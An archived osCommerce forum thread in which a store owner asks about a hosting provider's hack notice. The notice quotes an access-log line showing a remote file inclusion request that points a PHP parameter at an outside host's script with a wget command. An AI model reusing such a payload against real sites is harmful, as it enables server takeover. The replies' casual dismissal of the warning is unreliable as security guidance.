Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Hacked?


jasper98

Recommended Posts

Dear xxxx

 

It has come to our attention that your web space has been hacked:

 

access.log.xxxx - - [18/Aug/2006:04:54:57 -0400] "GET

http://xxx.xxx.xxx.xxx/s01.php?shopid=http...com/shop/CMD.gi

f?&cmd=wget HTTP/1.0" 200 2297 xxx.xxx.xxx.xxx

"http://xxx.xxx.xxx.xxx/s01.php?shopid=http://flaming-moe.com/shop/CMD.g

if?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "-"

 

--

 

The above was taken from your access logs. It shows that /s01.php was

used to perpetrate the hack.

 

Please contact the developers for this script/application. You will

likely need to install a version update and/or security patch to prevent

further abuse.

 

Also, reply to this email in acknowledgement of this issue. Failure to

do so can result in your account being locked and possibly terminated.

 

I received this email from 1and1 admin and am a bit confused. I have no s01.php on the server. Has anyone seen this before, I don't know how to resolve this with 1and1. I did a search for this attack and didn't find anything related to oscommerce, just powergap. Any help appreciated.

Link to comment
Share on other sites

I received this email from 1and1 admin and am a bit confused. I have no s01.php on the server. Has anyone seen this before, I don't know how to resolve this with 1and1. I did a search for this attack and didn't find anything related to oscommerce, just powergap. Any help appreciated.

 

I would request immediate termination and go elsewhere.

Treasurer MFC

Link to comment
Share on other sites

Could you elaborate a bit?

 

I understand that many people dislike 1and1, but I've had no issues with them until this.

 

I don't dislike 1and1 but when I see this kind of nonsense I can understand why some people might.

Treasurer MFC

Link to comment
Share on other sites

I don't dislike 1and1 but when I see this kind of nonsense I can understand why some people might.

 

ah, i see, so there is nothing to this then I'm guessing? I mean I can't find anything wrong with the site. Is this just a stupid email I should disregard? Notice at the bottom of their email it says to contact them about the issue. How should I respond?

Link to comment
Share on other sites

ah, i see, so there is nothing to this then I'm guessing? I mean I can't find anything wrong with the site. Is this just a stupid email I should disregard? Notice at the bottom of their email it says to contact them about the issue. How should I respond?

 

well, first I would ask them where they obtained the nerve to access your access logs as I would consider those company confidential information.

 

Then I would ask them to explain where they obtained the deduction that this is a successful hack.

It's an attempt maybe but those futile hack attempts I get daily.

Treasurer MFC

Link to comment
Share on other sites

well, first I would ask them where they obtained the nerve to access your access logs as I would consider those company confidential information.

 

Then I would ask them to explain where they obtained the deduction that this is a successful hack.

It's an attempt maybe but those futile hack attempts I get daily.

 

was my first reaction, thanks.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...